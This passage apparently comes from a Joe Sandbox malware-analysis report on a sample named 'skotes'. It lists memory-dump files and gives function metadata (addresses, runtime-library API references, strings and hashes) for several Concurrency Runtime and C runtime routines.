Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: 8ba76d33b4a21307af8bf9802c593e324a75f8e712b4d28e9fe60e644d7e7ff5
Instruction ID: 5a7a2b47265b0730fc99ae6d5f9fa7eca535ef126c4a2f9983c402a63a88f27b
Opcode Fuzzy Hash: 8ba76d33b4a21307af8bf9802c593e324a75f8e712b4d28e9fe60e644d7e7ff5
Instruction Fuzzy Hash: 64217C74C14209CBDF35EFA4C8557EEBBF4BF14320F200A2AE161A61D1EBB14A44CB91

Function 00981B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00981B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00981B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00981C2A

Strings

switchState, xrefs: 00981B5E
pContext, xrefs: 00981C22

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
String ID: pContext$switchState
API String ID: 2656283622-2660820399
Opcode ID: a484161a8d55196b904e82731dfe229078fb09901ddc9f6f8f13714a23094557
Instruction ID: 55301b313d82d9a470d87a00beca3aa9b3374c1292a9ebbfdb39184f6f652104
Opcode Fuzzy Hash: a484161a8d55196b904e82731dfe229078fb09901ddc9f6f8f13714a23094557
Instruction Fuzzy Hash: 1F31A535A00214ABCF05FF64C885AADB77DBF85324F204565E91197386EB71ED02CBD0

Function 0098727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 009872BE

Strings

.bat, xrefs: 009872ED
.cmd, xrefs: 009872DC
.com, xrefs: 009872FE
.exe, xrefs: 009872CB

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: d9b692aace0a983cb8628f69ebeaba34db8d678d117f65fb008f6d0531eae8b9
Instruction ID: 5f3ca69ecea89f542414fcc98cdf2d05d3facaa591e1f205d110d979c065502e
Opcode Fuzzy Hash: d9b692aace0a983cb8628f69ebeaba34db8d678d117f65fb008f6d0531eae8b9
Instruction Fuzzy Hash: BA01D627748626356615319DAD02B6A939C8BC2BB8B39002BFC54FB3C1EF54DC8263E1

Function 0096FA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0096FB06

Strings

SetThreadGroupAffinity, xrefs: 0096FA87
GetCurrentProcessorNumberEx, xrefs: 0096FABE
GetThreadGroupAffinity, xrefs: 0096FA93
kernel32.dll, xrefs: 0096FA7A

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 348560076-465693683
Opcode ID: c3e4eacf13b521f7583bf6408c54ab60c48b3dbdafb7d68025a8f97870f8c517
Instruction ID: bfb956fe56bf2512884fc0b5d93f933a607f45268fbcb7e879529c196cabf23f
Opcode Fuzzy Hash: c3e4eacf13b521f7583bf6408c54ab60c48b3dbdafb7d68025a8f97870f8c517
Instruction Fuzzy Hash: 4901F5625453156DA610B7F97C92BAB35DD9D8776C720153AF405E2291EDA4EC0041A1

Function 00982097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 009820B7

Part of subcall function 0097CAF3: Mailbox.LIBCMT ref: 0097CB2D

Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 009820C8
StructuredWorkStealingQueue.LIBCMT ref: 009820FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0098210F

Strings

e, xrefs: 009820D9

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
String ID: e
API String ID: 1411586358-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 744607425692907dce58f826f8a96479ca24abfe2fbc12ffb4991d9d980e67c4
